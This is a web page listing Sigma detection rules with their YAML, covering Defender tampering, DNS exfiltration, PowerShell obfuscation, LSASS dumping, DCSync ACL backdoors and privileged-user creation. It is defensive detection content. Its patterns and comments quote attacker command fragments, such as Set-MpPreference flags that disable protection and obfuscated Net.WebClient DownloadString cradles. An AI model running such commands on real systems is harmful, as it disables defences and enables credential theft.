
Sigma (generic) detection rules

3,750 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Get the raw rules from SigmaHQ Detection Rules: the raw generic YAML, served by SigmaHQ. Pick a platform above to download a ready-to-deploy converted pack.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good or quiet; hover either tier for the breakdown. The FP estimate is derived from rule shape, not from a measured rate, so use it to decide what to tune first before you deploy.

Detection rules

50 shown of 3,750
Level: high · Quality: Moderate · Alert volume: High FP
Powershell Base64 Encoded MpPreference Cmdlet
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK: technique · Rule id: c6fb44c6-71f5-49e6-9462-1425d328aee3
Sigma YAML:
title: Powershell Base64 Encoded MpPreference Cmdlet
id: c6fb44c6-71f5-49e6-9462-1425d328aee3
status: test
description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV
references:
    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2023-01-30
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|base64offset|contains:
              - 'Add-MpPreference '
              - 'Set-MpPreference '
              - 'add-mppreference '
              - 'set-mppreference '
        - CommandLine|contains:
              # UTF16-LE
              - 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
              - 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
              - 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
              - 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
    condition: selection
falsepositives:
    - Unknown
level: high

Level: high · Quality: Moderate · Alert volume: High FP
Powershell DNSExfiltration
DNSExfiltrator allows transferring (exfiltrating) a file over a DNS request covert channel
Status: test · Author: frack113 · ATT&CK: technique · Rule id: d59d7842-9a21-4bc6-ba98-64bfe0091355
Sigma YAML:
title: Powershell DNSExfiltration
id: d59d7842-9a21-4bc6-ba98-64bfe0091355
status: test
description: DNSExfiltrator allows transferring (exfiltrating) a file over a DNS request covert channel
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh
    - https://github.com/Arno0x/DNSExfiltrator
author: frack113
date: 2022-01-07
tags:
    - attack.exfiltration
    - attack.t1048
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmdlet:
        - ScriptBlockText|contains: 'Invoke-DNSExfiltrator'
        - ScriptBlockText|contains|all:
              - ' -i '
              - ' -d '
              - ' -p '
              - ' -doh '
              - ' -t '
    condition: selection_cmdlet
falsepositives:
    - Legitimate script
level: high

Level: high · Quality: Strong · Alert volume: Medium FP
Powershell Defender Disable Scan Feature
Detects requests to disable Microsoft Defender features using PowerShell commands
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK: technique · Rule id: 1ec65a5f-9473-4f12-97da-622044d6df21
Sigma YAML:
title: Powershell Defender Disable Scan Feature
id: 1ec65a5f-9473-4f12-97da-622044d6df21
status: test
description: Detects requests to disable Microsoft Defender features using PowerShell commands
references:
    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
    - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
    - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
author: Florian Roth (Nextron Systems)
date: 2022-03-03
modified: 2024-01-02
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli_cmdlet:
        CommandLine|contains:
            - 'Add-MpPreference '
            - 'Set-MpPreference '
    selection_cli_option:
        CommandLine|contains:
            - 'DisableArchiveScanning '
            - 'DisableRealtimeMonitoring '
            - 'DisableIOAVProtection '
            - 'DisableBehaviorMonitoring '
            - 'DisableBlockAtFirstSeen '
            - 'DisableCatchupFullScan '
            - 'DisableCatchupQuickScan '
    selection_cli_value:
        CommandLine|contains:
            - '$true'
            - ' 1 '
    selection_encoded_modifier:
        CommandLine|base64offset|contains:
            # Note: Since this is calculating offsets casing is important
            - 'disablearchivescanning '
            - 'DisableArchiveScanning '
            - 'disablebehaviormonitoring '
            - 'DisableBehaviorMonitoring '
            - 'disableblockatfirstseen '
            - 'DisableBlockAtFirstSeen '
            - 'disablecatchupfullscan '
            - 'DisableCatchupFullScan '
            - 'disablecatchupquickscan '
            - 'DisableCatchupQuickScan '
            - 'disableioavprotection '
            - 'DisableIOAVProtection '
            - 'disablerealtimemonitoring '
            - 'DisableRealtimeMonitoring '
    selection_encoded_direct:
        CommandLine|contains:
            - 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
            - 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'
            - 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'
            - 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'
            - 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'
            - 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'
            - 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
            - 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'
            - 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'
            - 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
            - 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
            - 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
            - 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'
            - 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'
            - 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'
            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'
            - 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'
            - 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'
    condition: all of selection_cli_* or 1 of selection_encoded_*
falsepositives:
    - Possible administrative activity
    - Other Cmdlets that may use the same parameters
level: high

Level: high · Quality: Moderate · Alert volume: High FP
Powershell Install a DLL in System Directory
Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
Status: test · Author: frack113, Nasreddine Bencherchali (Nextron Systems) · ATT&CK: sub-technique · Rule id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd
Sigma YAML:
title: Powershell Install a DLL in System Directory
id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd
status: test
description: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-27
modified: 2024-01-22
tags:
    - attack.persistence
    - attack.credential-access
    - attack.defense-impairment
    - attack.t1556.002
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|re: '(Copy-Item|cpi) .{2,128} -Destination .{1,32}\\Windows\\(System32|SysWOW64)'
    condition: selection
falsepositives:
    - Unknown
level: high

Level: high · Quality: Moderate · Alert volume: High FP
Powershell Token Obfuscation - Process Creation
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Status: test · Author: frack113 · ATT&CK: sub-technique · Rule id: deb9b646-a508-44ee-b7c9-d8965921c6b6
Sigma YAML:
title: Powershell Token Obfuscation - Process Creation
id: deb9b646-a508-44ee-b7c9-d8965921c6b6
related:
    - id: f3a98ce4-6164-4dd4-867c-4d83de7eca51
      type: similar
status: test
description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
references:
    - https://github.com/danielbohannon/Invoke-Obfuscation
author: frack113
date: 2022-12-27
modified: 2026-03-16
tags:
    - attack.stealth
    - attack.t1027.009
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # Examples:
        #   IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString
        #   &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString
        #   &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString
        - CommandLine|re: '\w+`(?:\w+|-|.)`[\w+|\s]'
        # - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme
        - CommandLine|re: '"(?:\{\d\})+"\s*-f'
        #   ${e`Nv:pATh}
        - CommandLine|re: '(?i)\$\{`?e`?n`?v`?:`?p`?a`?t`?h`?\}'
    filter_main_envpath:
        CommandLine|contains: '${env:path}'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

Level: high · Quality: Strong · Alert volume: Low FP
Powerview Add-DomainObjectAcl DCSync AD Extend Right
Detects the backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account using the PowerView Add-DomainObjectAcl DCSync extended-right cmdlet, which allows re-obtaining the password hashes of any user or computer
Status: test · Author: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat · ATT&CK: technique · Rule id: 2c99737c-585d-4431-b61a-c911d86ff32f
Sigma YAML:
title: Powerview Add-DomainObjectAcl DCSync AD Extend Right
id: 2c99737c-585d-4431-b61a-c911d86ff32f
status: test
description: Detects the backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account using the PowerView Add-DomainObjectAcl DCSync extended-right cmdlet, which allows re-obtaining the password hashes of any user or computer
references:
    - https://twitter.com/menasec1/status/1111556090137903104
    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
author: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat
date: 2019-04-03
modified: 2022-08-16
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
    definition: 'Requirements: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following event ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule needs to be set up (See https://github.com/OTRF/Set-AuditRule)'
detection:
    selection:
        EventID: 5136
        AttributeLDAPDisplayName: 'ntSecurityDescriptor'
        AttributeValue|contains:
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
            - '89e95b76-444d-4c62-991a-0facbeda640c'
    filter_main_dns_object_class:
        ObjectClass:
            - 'dnsNode'
            - 'dnsZoneScope'
            - 'dnsZone'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account.
level: high

Level: high · Quality: Moderate · Alert volume: Medium FP
Prefetch File Deleted
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
Status: test · Author: Cedric MAURUGEON · ATT&CK: sub-technique · Rule id: 0a1f9d29-6465-4776-b091-7f43b26e4c89
Sigma YAML:
title: Prefetch File Deleted
id: 0a1f9d29-6465-4776-b091-7f43b26e4c89
status: test
description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
references:
    - Internal Research
    - https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
author: Cedric MAURUGEON
date: 2021-09-29
modified: 2024-01-25
tags:
    - attack.stealth
    - attack.t1070.004
logsource:
    product: windows
    category: file_delete
detection:
    selection:
        TargetFilename|contains: ':\Windows\Prefetch\'
        TargetFilename|endswith: '.pf'
    filter_main_svchost:
        Image|endswith: ':\windows\system32\svchost.exe'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

Level: high · Quality: Moderate · Alert volume: Medium FP
Primary Refresh Token Access Attempt
Indicates an access attempt to the PRT resource, which can be used to move laterally into an organization or perform credential theft
Status: test · Author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' · ATT&CK: technique · Rule id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
Sigma YAML:
title: Primary Refresh Token Access Attempt
id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
status: test
description: Indicates an access attempt to the PRT resource, which can be used to move laterally into an organization or perform credential theft
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.t1528
    - attack.credential-access
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'attemptedPrtAccess'
    condition: selection
falsepositives:
    - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.
level: high

Level: high · Quality: Moderate · Alert volume: High FP
PrintBrm ZIP Creation or Extraction
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Status: test · Author: frack113 · ATT&CK: sub-technique · Rule id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
Sigma YAML:
title: PrintBrm ZIP Creation or Extraction
id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
status: test
description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
author: frack113
date: 2022-05-02
tags:
    - attack.command-and-control
    - attack.stealth
    - attack.t1105
    - attack.t1564.004
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\PrintBrm.exe'
        CommandLine|contains|all:
            - ' -f'
            - '.zip'
    condition: selection
falsepositives:
    - Unknown
level: high

Level: high · Quality: Strong · Alert volume: High FP
Privilege Escalation via Named Pipe Impersonation
Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
Status: test · Author: Tim Rauch, Elastic (idea) · ATT&CK: technique · Rule id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b
Sigma YAML:
title: Privilege Escalation via Named Pipe Impersonation
id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b
related:
    - id: f35c5d71-b489-4e22-a115-f003df287317
      type: derived
status: test
description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
references:
    - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
modified: 2022-12-30
tags:
    - attack.lateral-movement
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection_name:
        - Image|endswith:
              - '\cmd.exe'
              - '\powershell.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'PowerShell.EXE'
    selection_args:
        CommandLine|contains|all:
            - 'echo'
            - '>'
            - '\\\\.\\pipe\\'
    condition: all of selection*
falsepositives:
    - Other programs that cause these patterns (please report)
level: high

Level: high · Quality: Strong · Alert volume: Low FP
Privilege Role Elevation Not Occurring on SAW or PAW
Detects failed sign-in from a PAW or SAW device
Status: test · Author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' · ATT&CK: technique · Rule id: 38a5e67b-436a-4e77-9f73-f48a82626890
Sigma YAML:
title: Privilege Role Elevation Not Occurring on SAW or PAW
id: 38a5e67b-436a-4e77-9f73-f48a82626890
status: test
description: Detects failed sign-in from a PAW or SAW device
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You have to tune the rule for your environment before using it
    selection:
        # Entra audit activity display name for a PIM role activation
        properties.message|contains: Add member to role completed (PIM activation)
        # Countries you DO operate out of, e.g. GB; use a list for multiple
        Location|expand: '%LegitCountries%'
        IPaddress|expand: '%UnApprovedIp%'
        # Unapproved browser or operating system
        DeviceInfo|expand: '%UnApprovedDevice%'
        DeviceDetail.isCompliant: 'false'
        Status:
            - Sucess
            - failure
    condition: selection
falsepositives:
    - Not using a PAW/SAW in the environment
level: high

Level: high · Quality: Strong · Alert volume: Low FP
Privilege Role Sign-In Outside Expected Controls
Detects failed sign-in due to the user not meeting the expected controls for administrators
Status: test · Author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' · ATT&CK: technique · Rule id: cf1e5687-84e1-41af-97a9-158094efef53
Sigma YAML:
title: Privilege Role Sign-In Outside Expected Controls
id: cf1e5687-84e1-41af-97a9-158094efef53
status: test
description: Detects failed sign-in due to the user not meeting the expected controls for administrators
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.initial-access
    - attack.persistence
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You have to tune the rule for your environment before using it
    selection:
        Status: failure
        # Countries you do NOT operate out of, e.g. GB; use a list for multiple
        Location|expand: '%UnLegitCountries%'
        IPaddress|expand: '%UnApprovedIp%'
        # Unapproved browser or operating system
        DeviceInfo|expand: '%UnApprovedDevice%'
    condition: selection
falsepositives:
    - A legit admin not following proper processes
level: high

Level: high · Quality: Strong · Alert volume: Low FP
Privilege Role Sign-In Outside Of Normal Hours
Detects account sign-ins outside of normal hours or from uncommon locations. Administrator accounts should be investigated.
Status: test · Author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' · ATT&CK: technique · Rule id: e927a2f5-e7af-424f-ace7-70ebb49e8976
Sigma YAML:
title: Privilege Role Sign-In Outside Of Normal Hours
id: e927a2f5-e7af-424f-ace7-70ebb49e8976
status: test
description: Detects account sign-ins outside of normal hours or from uncommon locations. Administrator accounts should be investigated.
references:
    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
    - attack.persistence
    - attack.initial-access
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1078
logsource:
    product: azure
    service: signinlogs
detection:
    # You need to tune the rule for your environment before use
    selection:
        Status: Sucess
        # Countries you DO operate out of, e.g. GB; use a list for multiple
        Location|expand: '%LegitCountries%'
        # Outside normal working hours
        Date|expand: '%ClosingTime%'
        Initiatied.By|expand: '%ApprovedUserUpn%'
    condition: selection
falsepositives:
    - An admin doing actual work outside of normal business hours
level: high

Level: high · Quality: Moderate · Alert volume: Medium FP
Privileged User Has Been Created
Detects the addition of a new user to a privileged group such as "root" or "sudo"
Status: test · Author: Pawel Mazur · ATT&CK: sub-technique · Rule id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e
Sigma YAML:
title: Privileged User Has Been Created
id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e
status: test
description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
references:
    - https://digital.nhs.uk/cyber-alerts/2018/cc-2825
    - https://linux.die.net/man/8/useradd
    - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
author: Pawel Mazur
date: 2022-12-21
modified: 2025-01-21
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1136.001
    - attack.t1098
logsource:
    product: linux
    definition: '/var/log/secure on RHEL systems or /var/log/auth.log on Debian-like systems needs to be collected in order for this detection to work'
detection:
    # Examples of the events that could be observed when matching these are as follows
    #   Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash
    #   Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash
    #   Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash
    #   Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash
    selection_new_user:
        - 'new user'
    selection_uids_gids:
        - 'GID=0,' # root group
        - 'UID=0,' # root UID
        - 'GID=10,' # wheel group
        - 'GID=27,' # sudo group
    condition: all of selection_*
falsepositives:
    - Administrative activity
level: high

Level: high · Quality: Strong · Alert volume: Medium FP
Process Access via TrolleyExpress Exclusion
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK: sub-technique · Rule id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6
Sigma YAML:
title: Process Access via TrolleyExpress Exclusion
id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6
status: test
description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
references:
    - https://twitter.com/_xpn_/status/1491557187168178176
    - https://www.youtube.com/watch?v=Ie831jF0bb0
author: Florian Roth (Nextron Systems)
date: 2022-02-10
modified: 2022-05-13
tags:
    - attack.stealth
    - attack.t1218.011
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter
            - '\TrolleyExpress 7'
            - '\TrolleyExpress 8'
            - '\TrolleyExpress 9'
            - '\TrolleyExpress.exe 7'
            - '\TrolleyExpress.exe 8'
            - '\TrolleyExpress.exe 9'
            # Common dumpers
            - '\TrolleyExpress.exe -ma '
    renamed:
        Image|endswith: '\TrolleyExpress.exe'
    filter_renamed:
        OriginalFileName|contains: 'CtxInstall'
    filter_empty:
        OriginalFileName: null
    condition: selection or ( renamed and not 1 of filter* )
falsepositives:
    - Unknown
level: high

Level: high · Quality: Moderate · Alert volume: Medium FP
Process Execution Error In JVM Based Application
Detects process execution related exceptions in JVM based apps, which often relate to RCE
Status: test · Author: Moti Harmats · ATT&CK: technique · Rule id: d65f37da-a26a-48f8-8159-3dde96680ad2
Sigma YAML:
title: Process Execution Error In JVM Based Application
id: d65f37da-a26a-48f8-8159-3dde96680ad2
status: test
description: Detects process execution related exceptions in JVM based apps, which often relate to RCE
references:
    - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
    - attack.initial-access
    - attack.t1190
logsource:
    category: application
    product: jvm
    definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
    keywords:
        - 'Cannot run program'
        - 'java.lang.ProcessImpl'
        - 'java.lang.ProcessBuilder'
    condition: keywords
falsepositives:
    - Application bugs
level: high

Level: high · Quality: Strong · Alert volume: Medium FP
Process Execution From A Potentially Suspicious Folder
Detects a potentially suspicious execution from an uncommon folder.
Status: test · Author: Florian Roth (Nextron Systems), Tim Shelton · ATT&CK: technique · Rule id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
Sigma YAML:
title: Process Execution From A Potentially Suspicious Folder
id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
status: test
description: Detects a potentially suspicious execution from an uncommon folder.
references:
    - https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt
    - https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
    - https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-01-16
modified: 2024-07-12
tags:
    - attack.stealth
    - attack.t1036
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|contains:
            - ':\Perflogs\'
            - ':\Users\All Users\'
            - ':\Users\Default\'
            - ':\Users\NetworkService\'
            - ':\Windows\addins\'
            - ':\Windows\debug\'
            - ':\Windows\Fonts\'
            - ':\Windows\Help\'
            - ':\Windows\IME\'
            - ':\Windows\Media\'
            - ':\Windows\repair\'
            - ':\Windows\security\'
            - ':\Windows\System32\Tasks\'
            - ':\Windows\Tasks\'
            - '$Recycle.bin'
            - '\config\systemprofile\'
            - '\Intel\Logs\'
            - '\RSA\MachineKeys\'
    filter_optional_ibm:
        Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\'
    filter_optional_citrix:
        Image|startswith: 'C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\'
        Image|endswith: '\CitrixReceiverUpdater.exe'
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

Level: high · Quality: Strong · Alert volume: Medium FP
